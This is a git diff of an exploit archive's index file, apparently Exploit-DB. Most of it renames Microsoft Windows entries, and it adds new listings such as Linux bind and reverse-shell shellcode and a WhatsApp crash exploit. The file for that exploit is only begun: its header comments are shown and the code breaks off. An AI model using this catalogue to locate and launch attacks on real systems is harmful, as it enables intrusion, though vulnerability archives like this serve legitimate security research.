-14611,platforms/windows/dos/14611.c,"Microsoft Windows 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability (MS10-048)",2010-08-10,MJ0011,windows,dos,0
+14611,platforms/windows/dos/14611.c,"Microsoft Windows - 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability (MS10-048)",2010-08-10,MJ0011,windows,dos,0
 14612,platforms/windows/local/14612.py,"Mediacoder 0.7.5.4710 Buffer Overflow Exploit",2010-08-11,anonymous,windows,local,0
 14613,platforms/windows/dos/14613.py,"Windows Live Messenger <= 14.0.8117 Animation Remote Denial of Service",2010-08-11,TheLeader,windows,dos,0
 14614,platforms/php/webapps/14614.txt,"clearBudget 0.9.8 - Remote File Include Vulnerability",2010-08-11,Offensive,php,webapps,0
@@ -12839,7 +12839,7 @@ id,file,description,date,author,platform,type,port
 14702,platforms/php/webapps/14702.txt,"Joomla Component com_zina SQL Injection Vulnerability",2010-08-21,"Th3 RDX",php,webapps,0
 14703,platforms/php/webapps/14703.txt,"Joomla Component Biblioteca 1.0 Beta Multiple SQL Injection Vulnerabilities",2010-08-21,"Salvatore Fresta",php,webapps,0
 14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script SQL Injection Vulnerability",2010-08-21,"Br0wn Sug4r",asp,webapps,0
-14705,platforms/windows/dos/14705.c,"Microsoft Windows (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability",2010-08-21,l3D,windows,dos,0
+14705,platforms/windows/dos/14705.c,"Microsoft Windows - (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability",2010-08-21,l3D,windows,dos,0
 14706,platforms/windows/local/14706.py,"MS Excel Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0
 14707,platforms/php/webapps/14707.txt,"Joomla Component (com_Fabrik) SQL Injection Vulnerability",2010-08-21,Mkr0x,php,webapps,0
 14709,platforms/asp/webapps/14709.txt,"netStartEnterprise 4.0 - SQL Injection Vulnerability",2010-08-22,L1nK,asp,webapps,0
@@ -12860,7 +12860,7 @@ id,file,description,date,author,platform,type,port
 14730,platforms/windows/local/14730.c,"Firefox <= 3.6.8 DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Glafkos Charalambous ",windows,local,0
 14731,platforms/windows/local/14731.c,"Microsoft Windows Movie Maker <= 2.6.4038.0 DLL Hijacking Exploit (hhctrl.ocx)",2010-08-24,TheLeader,windows,local,0
 14732,platforms/windows/local/14732.c,"Opera 10.61 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Nicolas Krassas",windows,local,0
-14733,platforms/windows/local/14733.c,"Microsoft Windows 7 wab.exe DLL Hijacking Exploit (wab32res.dll)",2010-08-24,TheLeader,windows,local,0
+14733,platforms/windows/local/14733.c,"Microsoft Windows 7 - wab.exe DLL Hijacking Exploit (wab32res.dll)",2010-08-24,TheLeader,windows,local,0
 14734,platforms/windows/local/14734.c,"TeamViewer <= 5.0.8703 DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Glafkos Charalambous ",windows,local,0
 14735,platforms/windows/local/14735.c,"Adobe Dreamweaver CS4 DLL Hijacking Exploit (ibfs32.dll)",2010-08-24,"Glafkos Charalambous ",windows,local,0
 14737,platforms/php/webapps/14737.txt,"Simple Forum PHP Multiple Vulnerabilities",2010-08-25,arnab_s,php,webapps,0
@@ -13952,7 +13952,7 @@ id,file,description,date,author,platform,type,port
 16160,platforms/php/webapps/16160.txt,"Pixelpost 1.7.3 - Multiple POST Variables SQL Injection Vulnerability",2011-02-12,LiquidWorm,php,webapps,0
 16162,platforms/windows/local/16162.pl,"CuteZip 2.1 - Buffer Overflow Exploit",2011-02-12,"C4SS!0 G0M3S",windows,local,0
 16165,platforms/php/webapps/16165.txt,"AWCM 2.2 Final - Persistent Cross Site Script Vulnerability",2011-02-14,_84kur10_,php,webapps,0
-16166,platforms/windows/dos/16166.py,"MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0
+16166,platforms/windows/dos/16166.py,"Microsoft Windows 2003 - AD Pre-Auth BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0
 16167,platforms/php/webapps/16167.txt,"jSchool Advanced SQL Injection Vulnerability",2011-02-14,eXa.DisC,php,webapps,0
 16168,platforms/php/webapps/16168.txt,"runcms 2.2.2 - Multiple Vulnerabilities",2011-02-14,"High-Tech Bridge SA",php,webapps,0
 16169,platforms/windows/local/16169.py,"Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC Exploit",2011-02-15,mr_me,windows,local,0
@@ -14032,7 +14032,7 @@ id,file,description,date,author,platform,type,port
 16259,platforms/windows/remote/16259.txt,"home ftp server 1.12 - Directory Traversal",2011-02-28,clshack,windows,remote,0
 16260,platforms/windows/dos/16260.py,"Quick 'n Easy FTP Server 3.2 - Denial of Service",2011-02-28,clshack,windows,dos,0
 16261,platforms/multiple/dos/16261.txt,"PHP Exif Extension 'exif_read_data()' Function Remote DoS",2011-02-28,"_ikki and paradoxengine",multiple,dos,0
-16262,platforms/windows/dos/16262.c,"MS Windows XP - WmiTraceMessageVa Integer Truncation Vulnerability PoC (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos,0
+16262,platforms/windows/dos/16262.c,"Microsoft Windows XP - WmiTraceMessageVa Integer Truncation Vulnerability PoC (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos,0
 16263,platforms/linux/dos/16263.c,"Linux Kernel <= 2.6.37 - Local Kernel Denial of Service",2011-03-02,prdelka,linux,dos,0
 16264,platforms/windows/local/16264.pl,"Magic Music Editor - Buffer Overflow Exploit",2011-03-02,"C4SS!0 G0M3S",windows,local,0
 16265,platforms/php/webapps/16265.txt,"Readmore Systems Script SQL Injection Vulnerability",2011-03-02,"vBzone and Zooka and El3arby",php,webapps,0
@@ -14872,7 +14872,7 @@ id,file,description,date,author,platform,type,port
 17128,platforms/php/webapps/17128.txt,"greenpants 0.1.7 - Multiple Vulnerabilities",2011-04-06,"Ptrace Security",php,webapps,0
 17129,platforms/php/webapps/17129.txt,"S40 CMS 0.4.2b LFI Vulnerability",2011-04-07,Osirys,php,webapps,0
 17132,platforms/php/webapps/17132.py,"Joomla! com_virtuemart <= 1.1.7 - Blind SQL Injection Exploit",2011-04-08,"TecR0c and mr_me",php,webapps,0
-17133,platforms/windows/dos/17133.c,"Microsoft Windows xp AFD.sys Local Kernel DoS Exploit",2011-04-08,"Lufeng Li",windows,dos,0
+17133,platforms/windows/dos/17133.c,"Microsoft Windows XP - AFD.sys Local Kernel DoS Exploit",2011-04-08,"Lufeng Li",windows,dos,0
 17134,platforms/php/webapps/17134.txt,"phpcollab 2.5 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0
 17135,platforms/php/webapps/17135.txt,"viscacha 0.8.1 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0
 17136,platforms/php/webapps/17136.txt,"Joomla JCE Component (com_jce) Blind SQL Injection Vulnerability",2011-04-09,eidelweiss,php,webapps,0
@@ -16240,7 +16240,7 @@ id,file,description,date,author,platform,type,port
 18816,platforms/windows/dos/18816.py,"LAN Messenger <= 1.2.28 - Denial of Service Vulnerability",2012-05-01,"Julien Ahrens",windows,dos,0
 18817,platforms/hardware/dos/18817.py,"Mikrotik Router Denial of Service",2012-05-01,PoURaN,hardware,dos,0
 18818,platforms/windows/remote/18818.py,"Solarwinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection Exploit",2012-05-01,muts,windows,remote,0
-18819,platforms/windows/dos/18819.cpp,"Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability",2012-05-02,"Lufeng Li",windows,dos,0
+18819,platforms/windows/dos/18819.cpp,"Microsoft Windows XP - Win32k.sys Local Kernel DoS Vulnerability",2012-05-02,"Lufeng Li",windows,dos,0
 18820,platforms/php/webapps/18820.php,"OpenConf <= 4.11 (author/edit.php) Remote Blind SQL Injection Exploit",2012-05-02,EgiX,php,webapps,0
 18822,platforms/php/webapps/18822.txt,"php-decoda - Cross-Site Scripting In Video Tag",2012-05-02,"RedTeam Pentesting",php,webapps,0
 18823,platforms/windows/local/18823.txt,"Symantec pcAnywhere Insecure File Permissions Local Privilege Escalation",2012-05-02,"Edward Torkington",windows,local,0
@@ -16505,7 +16505,7 @@ id,file,description,date,author,platform,type,port
 19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 Memory Corruption Exploit",2012-06-14,"Felipe Andres Manzano",multiple,local,0
 19141,platforms/windows/remote/19141.rb,"Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037)",2012-06-14,metasploit,windows,remote,0
 19142,platforms/linux/local/19142.sh,"Oracle 8 File Access Vulnerabilities",1999-05-06,"Kevin Wenchel",linux,local,0
-19143,platforms/windows/local/19143.c,"Microsoft Windows ""April Fools 2001"" Vulnerability",1999-01-07,"Richard M. Smith",windows,local,0
+19143,platforms/windows/local/19143.c,"Microsoft Windows - ""April Fools 2001"" Vulnerability",1999-01-07,"Richard M. Smith",windows,local,0
 19144,platforms/windows/local/19144,"Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 Backdoor Vulnerability",1999-01-07,"Satu Laksela",windows,local,0
 19145,platforms/windows/local/19145.c,"NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4 Server Operator to Administrator Privilege Escalation: System Key Vulnerability",1999-01-11,Mnemonix,windows,local,0
 19146,platforms/linux/local/19146.sh,"DataLynx suGuard 1.0 Vulnerability",1999-01-03,"Dr. Mudge",linux,local,0
@@ -16923,7 +16923,7 @@ id,file,description,date,author,platform,type,port
 19591,platforms/windows/remote/19591.txt,"MS IE 4.0/5.0,Outlook 98 0 window.open Redirect Vulnerability",1999-11-04,"Georgi Guninski",windows,remote,0
 19592,platforms/windows/remote/19592.asm,"Real Networks GameHouse dldisplay ActiveX control 0 Port Buffer Overflow (1)",1999-11-04,"dark spyrit",windows,remote,0
 19593,platforms/windows/remote/19593.c,"Real Networks GameHouse dldisplay ActiveX control 0 Port Buffer Overflow (2)",1999-11-04,"dark spyrit",windows,remote,0
-19594,platforms/windows/local/19594.txt,"MS Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Spoolss.exe DLL Insertion Vulnerability",1999-11-04,"Marc of eEye",windows,local,0
+19594,platforms/windows/local/19594.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Spoolss.exe DLL Insertion Vulnerability",1999-11-04,"Marc of eEye",windows,local,0
 19595,platforms/windows/remote/19595.c,"Computer Software Manufaktur Alibaba 2.0 - Multiple CGI Vulnerabilties",1999-11-03,Kerb,windows,remote,0
 19596,platforms/windows/remote/19596.txt,"Byte Fusion BFTelnet 1.1 Long Username DoS Vulnerability",1999-11-03,"Ussr Labs",windows,remote,0
 19597,platforms/php/webapps/19597.txt,"GuestBook Scripts PHP 1.5 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0
@@ -17530,7 +17530,7 @@ id,file,description,date,author,platform,type,port
 20229,platforms/multiple/dos/20229.txt,"IBM Websphere Application Server 3.0.2 Server Plugin DoS Vulnerability",2000-09-15,"Rude Yak",multiple,dos,0
 20230,platforms/sco/local/20230.c,"Tridia DoubleVision 3.0 7.00 Local Root Compromise",2000-06-24,"Stephen J. Friedl",sco,local,0
 20231,platforms/hardware/remote/20231.txt,"Cisco PIX Firewall 4.x/5.x SMTP Content Filtering Evasion Vulnerability",2000-09-19,"Lincoln Yeoh",hardware,remote,0
-20232,platforms/windows/local/20232.cpp,"MS Windows 2000/NT 4 DLL Search Path Weakness",2000-09-18,"Georgi Guninski",windows,local,0
+20232,platforms/windows/local/20232.cpp,"Microsoft Windows 2000/NT 4 - DLL Search Path Weakness",2000-09-18,"Georgi Guninski",windows,local,0
 20233,platforms/windows/dos/20233.txt,"NetcPlus BrowseGate 2.80 DoS Vulnerability",2000-09-21,"Delphis Consulting",windows,dos,0
 20234,platforms/multiple/remote/20234.txt,"extent technologies rbs isp 2.5 - Directory Traversal vulnerability",2000-09-21,anon,multiple,remote,8002
 20235,platforms/windows/remote/20235.pl,"Cisco Secure ACS for Windows NT 2.42 Buffer Overflow Vulnerability",2000-09-21,blackangels,windows,remote,0
@@ -18148,7 +18148,7 @@ id,file,description,date,author,platform,type,port
 20877,platforms/hardware/webapps/20877.txt,"Conceptronic Grab’n’Go and Sitecom Storage Center Password Disclosure",2012-08-28,"Mattijs van Ommeren",hardware,webapps,0
 20878,platforms/cgi/remote/20878.txt,"mimanet source viewer 2.0 - Directory Traversal vulnerability",2001-05-23,joetesta,cgi,remote,0
 20879,platforms/unix/remote/20879.txt,"OpenServer 5.0.5/5.0.6,HP-UX 10/11,Solaris 2.6/7.0/8 rpc.yppasswdd Buffer Overrun",2001-05-10,metaray,unix,remote,0
-20880,platforms/windows/local/20880.c,"MS Windows 2000 Debug Registers Vulnerability",2001-05-24,"Georgi Guninski",windows,local,0
+20880,platforms/windows/local/20880.c,"Microsoft Windows 2000 - Debug Registers Vulnerability",2001-05-24,"Georgi Guninski",windows,local,0
 20881,platforms/multiple/remote/20881.txt,"Beck IPC GmbH IPC@CHIP TelnetD Login Account Brute Force Vulnerability",2001-05-24,"Courtesy Sentry Research Labs",multiple,remote,0
 20882,platforms/multiple/remote/20882.txt,"faust informatics freestyle chat 4.1 sr2 - Directory Traversal vulnerability",2001-05-25,nemesystm,multiple,remote,0
 20883,platforms/windows/dos/20883.txt,"Faust Informatics Freestyle Chat 4.1 SR2 MS-DOS Device Name DoS",2001-05-25,nemesystm,windows,dos,0
@@ -18924,14 +18924,14 @@ id,file,description,date,author,platform,type,port
 21681,platforms/windows/remote/21681.html,"Opera 6.0.x FTP View Cross-Site Scripting Vulnerability",2002-08-06,"Eiji James Yoshida",windows,remote,0
 21682,platforms/unix/remote/21682.txt,"Mozilla 1.0/1.1 FTP View Cross-Site Scripting Vulnerability",2002-08-06,"Eiji James Yoshida",unix,remote,0
 21683,platforms/linux/local/21683.c,"qmailadmin 1.0.x Local Buffer Overflow Vulnerability",2002-08-06,"Thomas Cannon",linux,local,0
-21684,platforms/windows/local/21684.c,"MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (1)",2002-08-06,sectroyer,windows,local,0
-21685,platforms/windows/local/21685.c,"MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (2)",2002-08-06,"Oliver Lavery",windows,local,0
-21686,platforms/windows/local/21686.c,"MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (3)",2002-08-06,"Brett Moore",windows,local,0
-21687,platforms/windows/local/21687.c,"MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (4)",2002-08-06,"Brett Moore",windows,local,0
-21688,platforms/windows/local/21688.c,"MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (5)",2002-08-06,"Oliver Lavery",windows,local,0
-21689,platforms/windows/local/21689.c,"MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (6)",2002-08-06,"Brett Moore",windows,local,0
-21690,platforms/windows/local/21690.txt,"MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (7)",2002-08-06,"Ovidio Mallo",windows,local,0
-21691,platforms/windows/local/21691.txt,"MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (8)",2002-08-06,anonymous,windows,local,0
+21684,platforms/windows/local/21684.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (1)",2002-08-06,sectroyer,windows,local,0
+21685,platforms/windows/local/21685.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (2)",2002-08-06,"Oliver Lavery",windows,local,0
+21686,platforms/windows/local/21686.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (3)",2002-08-06,"Brett Moore",windows,local,0
+21687,platforms/windows/local/21687.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (4)",2002-08-06,"Brett Moore",windows,local,0
+21688,platforms/windows/local/21688.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (5)",2002-08-06,"Oliver Lavery",windows,local,0
+21689,platforms/windows/local/21689.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (6)",2002-08-06,"Brett Moore",windows,local,0
+21690,platforms/windows/local/21690.txt,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (7)",2002-08-06,"Ovidio Mallo",windows,local,0
+21691,platforms/windows/local/21691.txt,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (8)",2002-08-06,anonymous,windows,local,0
 21692,platforms/windows/remote/21692.txt,"MS IE 5/6,Konqueror 2.2.2/3.0,Weblogic Server 5/6/7 Invalid X.509 Certificate Chain",2002-08-06,"Mike Benham",windows,remote,0
 21693,platforms/windows/remote/21693.nasl,"Microsoft SQL Server 2000 User Authentication Remote Buffer Overflow Vulnerability",2002-08-06,"Dave Aitel",windows,remote,0
 21694,platforms/windows/remote/21694.pl,"602Pro LAN SUITE 2002 Telnet Proxy Localhost Denial of Service Vulnerability",2002-08-03,"Stan Bubrouski",windows,remote,0
@@ -18984,8 +18984,8 @@ id,file,description,date,author,platform,type,port
 21743,platforms/php/webapps/21743.txt,"phpmybittorrent 2.04 - Multiple Vulnerabilities",2012-10-04,waraxe,php,webapps,0
 21744,platforms/windows/webapps/21744.txt,"Novell Sentinel Log Manager <= 1.2.0.2 - Retention Policy Vulnerability",2012-10-04,"Piotr Chmylkowski",windows,webapps,0
 21745,platforms/php/webapps/21745.txt,"Achievo 0.7/0.8/0.9 - Remote File Include Command Execution Vulnerability",2002-08-22,"Jeroen Latour",php,webapps,0
-21746,platforms/windows/dos/21746.c,"MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos,0
-21747,platforms/windows/dos/21747.txt,"MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,windows,dos,0
+21746,platforms/windows/dos/21746.c,"Microsoft Windows 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos,0
+21747,platforms/windows/dos/21747.txt,"Microsoft Windows 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,windows,dos,0
 21748,platforms/windows/remote/21748.txt,"MS IE 5/6 Legacy Text Formatting ActiveX Component Buffer Overflow",2002-08-22,"Mark Litchfield",windows,remote,0
 21749,platforms/windows/remote/21749.txt,"Microsoft Internet Explorer 5/6 XML Redirect File Disclosure Vulnerability",2002-08-23,"GreyMagic Software",windows,remote,0
 21750,platforms/windows/remote/21750.txt,"Microsoft Internet Explorer 5 Dialog Same Origin Policy Bypass Variant Vulnerability",2002-04-16,"GreyMagic Software",windows,remote,0
@@ -19137,7 +19137,7 @@ id,file,description,date,author,platform,type,port
 21899,platforms/php/webapps/21899.txt,"PHPWebSite 0.8.3 Article.PHP Cross-Site Scripting Vulnerability",2002-10-02,Sp.IC,php,webapps,0
 21900,platforms/php/webapps/21900.txt,"MySimpleNews 1.0 PHP Injection Vulnerability",2002-10-02,frog,php,webapps,0
 21901,platforms/php/webapps/21901.txt,"MySimpleNews 1.0 - Remotely Readable Administrator Password Vulnerability",2002-10-02,frog,php,webapps,0
-21902,platforms/windows/remote/21902.c,"MS Windows XP/2000/NT 4 Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0
+21902,platforms/windows/remote/21902.c,"Microsoft Windows 2000/XP/NT 4 - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0
 21903,platforms/php/webapps/21903.txt,"Michael Schatz Books 0.54/0.6 PostNuke Module Cross Site Scripting Vulnerability",2002-10-03,Pistone,php,webapps,0
 21904,platforms/aix/local/21904.pl,"IBM AIX 4.3.x/5.1 ERRPT Local Buffer Overflow Vulnerability",2003-04-16,watercloud,aix,local,0
 21905,platforms/php/webapps/21905.txt,"phpMyNewsLetter 0.6.10 Remote File Include Vulnerability",2002-10-03,frog,php,webapps,0
@@ -19155,8 +19155,8 @@ id,file,description,date,author,platform,type,port
 21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 Trojan Horse Vulnerability",2002-10-08,netmask,unix,remote,0
 21920,platforms/asp/webapps/21920.txt,"Microsoft Content Management Server 2001 Cross-Site Scripting Vulnerability",2002-10-09,overclocking_a_la_abuela,asp,webapps,0
 21921,platforms/php/webapps/21921.txt,"VBZoom 1.0 - Arbitrary File Upload Vulnerability",2002-10-09,hish,php,webapps,0
-21922,platforms/windows/local/21922.c,"MS Windows XP/2000/NT 4 NetDDE Privilege Escalation Vulnerability (1)",2002-10-09,Serus,windows,local,0
-21923,platforms/windows/local/21923.c,"MS Windows XP/2000/NT 4 NetDDE Privilege Escalation Vulnerability (2)",2002-10-09,Serus,windows,local,0
+21922,platforms/windows/local/21922.c,"Microsoft Windows 2000/XP/NT 4 - NetDDE Privilege Escalation Vulnerability (1)",2002-10-09,Serus,windows,local,0
+21923,platforms/windows/local/21923.c,"Microsoft Windows 2000/XP/NT 4 - NetDDE Privilege Escalation Vulnerability (2)",2002-10-09,Serus,windows,local,0
 21924,platforms/asp/webapps/21924.txt,"SurfControl SuperScout Email Filter 3.5 MsgError.ASP Cross-Site Scripting Vulnerability",2002-10-08,ken@FTU,asp,webapps,0
 21925,platforms/asp/webapps/21925.txt,"SurfControl SuperScout Email Filter 3.5 User Credential Disclosure Vulnerability",2002-10-08,ken@FTU,asp,webapps,0
 21926,platforms/cgi/webapps/21926.txt,"Authoria HR Suite AthCGI.EXE Cross-Site Scripting Vulnerability",2002-10-09,Max,cgi,webapps,0
@@ -26572,7 +26572,7 @@ id,file,description,date,author,platform,type,port
 29627,platforms/php/webapps/29627.php,"Magic News Plus 1.0.2 preview.php php_script_path Parameter Remote File Inclusion",2007-02-21,"HACKERS PAL",php,webapps,0
 29628,platforms/php/webapps/29628.txt,"Magic News Plus 1.0.2 news.php link_parameters Parameter XSS",2007-02-21,"HACKERS PAL",php,webapps,0
 29629,platforms/php/webapps/29629.txt,"Magic News Plus 1.0.2 n_layouts.php link_parameters Parameter XSS",2007-02-21,"HACKERS PAL",php,webapps,0
-29630,platforms/windows/local/29630.c,"Microsoft Windows 2003/XP ReadDirectoryChangesW Information Disclosure Vulnerability",2007-02-22,3APA3A,windows,local,0
+29630,platforms/windows/local/29630.c,"Microsoft Windows 2003/XP - ReadDirectoryChangesW Information Disclosure Vulnerability",2007-02-22,3APA3A,windows,local,0
 29631,platforms/php/webapps/29631.txt,"Pyrophobia 2.1.3.1 modules/out.php id Parameter XSS",2007-02-22,"laurent gaffie",php,webapps,0
 29632,platforms/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 admin/index.php Multiple Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0
 29633,platforms/ios/webapps/29633.txt,"Google Gmail IOS Mobile Application - Persistent / Stored XSS",2013-11-16,"Ali Raza",ios,webapps,0
@@ -31818,7 +31818,7 @@ id,file,description,date,author,platform,type,port
 35323,platforms/php/webapps/35323.md,"MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability",2014-11-22,"Taoguang Chen",php,webapps,0
 35324,platforms/php/webapps/35324.txt,"Wordpress CM Download Manager Plugin 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",php,webapps,0
 35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0
-35326,platforms/windows/dos/35326.cpp,"Microsoft Windows Win32k.sys - Denial of Service",2014-11-22,Kedamsky,windows,dos,0
+35326,platforms/windows/dos/35326.cpp,"Microsoft Windows - Win32k.sys Denial of Service",2014-11-22,Kedamsky,windows,dos,0
 35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0
 35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
 35329,platforms/php/webapps/35329.txt,"PHPXref 0.7 'nav.html' Cross Site Scripting Vulnerability",2011-02-09,MustLive,php,webapps,0
@@ -31974,6 +31974,7 @@ id,file,description,date,author,platform,type,port
 35489,platforms/multiple/dos/35489.pl,"Perl 5.x 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service Vulnerability",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0
 35490,platforms/php/webapps/35490.txt,"IceHrm 7.1 - Multiple Vulnerabilities",2014-12-08,LiquidWorm,php,webapps,0
 35491,platforms/php/webapps/35491.txt,"PBBoard CMS - Stored XSS Vulnerability",2014-12-08,"Manish Tanwar",php,webapps,0
+35492,platforms/php/webapps/35492.txt,"Free Article Submissions 1.0 - SQL Injection Vulnerability",2014-12-08,BarrabravaZ,php,webapps,0
 35493,platforms/php/webapps/35493.txt,"Wordpress Ajax Store Locator 1.2 - Arbitrary File Download",2014-12-08,"Claudio Viviani",php,webapps,0
 35495,platforms/multiple/remote/35495.txt,"Advantech/BroadWin SCADA WebAccess 7.0 - Multiple Remote Security Vulnerabilities",2011-03-23,"Ruben Santamarta ",multiple,remote,0
 35496,platforms/php/webapps/35496.txt,"MC Content Manager 10.1.1 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps,0
@@ -32051,6 +32052,8 @@ id,file,description,date,author,platform,type,port
 35582,platforms/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
 35583,platforms/php/webapps/35583.txt,"Piwigo 2.7.2 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
 35585,platforms/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
+35586,platforms/lin_x86-64/shellcode/35586.c,"x64 Linux bind TCP port shellcode (81 bytes, 96 with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
+35587,platforms/lin_x86-64/shellcode/35587.c,"x64 Linux reverse TCP connect shellcode (77 to 85 bytes, 90 to 98 with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
 35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server (Protector for Mail) LFI to RCE",2014-12-22,"Patrick Webster",php,remote,9000
 35589,platforms/windows/dos/35589.py,"NotePad++ 6.6.9 - Buffer Overflow",2014-12-22,TaurusOmar,windows,dos,0
 35590,platforms/windows/local/35590.txt,"BitRaider Streaming Client 1.3.3.4098 Local Privilege Escalation Vulnerability",2014-12-23,LiquidWorm,windows,local,0
@@ -32096,3 +32099,10 @@ id,file,description,date,author,platform,type,port
 35634,platforms/php/webapps/35634.txt,"WordPress WP-StarsRateBox Plugin 1.1 'j' Parameter SQL Injection Vulnerability",2011-04-19,"High-Tech Bridge SA",php,webapps,0
 35635,platforms/php/webapps/35635.txt,"Dalbum 1.43 'editini.php' Cross Site Scripting Vulnerability",2011-04-19,"High-Tech Bridge SA",php,webapps,0
 35636,platforms/php/webapps/35636.txt,"ChatLakTurk php Botlu Video 'ara.php' Cross Site Scripting Vulnerability",2011-04-19,"kurdish hackers team",php,webapps,0
+35637,platforms/android/remote/35637.py,"WhatsApp <= 2.11.476 - Remote Reboot/Crash App Android",2014-12-28,"Daniel Godoy",android,remote,0
+35638,platforms/multiple/remote/35638.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/E1Menu.maf jdeowpBackButtonProtect Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0
+35639,platforms/multiple/remote/35639.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/E1Menu_Menu.mafService e1.namespace Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0
+35640,platforms/multiple/remote/35640.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/E1Menu_OCL.mafService e1.namespace Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0
+35641,platforms/multiple/remote/35641.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/MafletClose.mafService RENDER_MAFLET Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0
+35642,platforms/multiple/remote/35642.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0
+35643,platforms/php/webapps/35643.txt,"webSPELL 4.2.2a Multiple Cross-Site Scripting Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0
diff --git a/platforms/android/remote/35637.py b/platforms/android/remote/35637.py
new file mode 100755
index 000000000..c29493c6e
--- /dev/null
+++ b/platforms/android/remote/35637.py
@@ -0,0 +1,104 @@
+#!/usr/bin/python
+#-*- coding: utf-8 -*
+
+# Title: WhatsApp Remote Reboot/Crash App Android
+# Product: WhatsApp
+# Vendor Homepage: http://www.whatsapp.com
+# Vulnerable Version(s): 2.11.476
+# Tested on: WhatsApp v2.11.476 on MotoG 2014 -Android 4.4.4
+# Date: 26/12/2014
+# #RemoteExecution - www.remoteexecution.net
+#
+# Author Exploit:
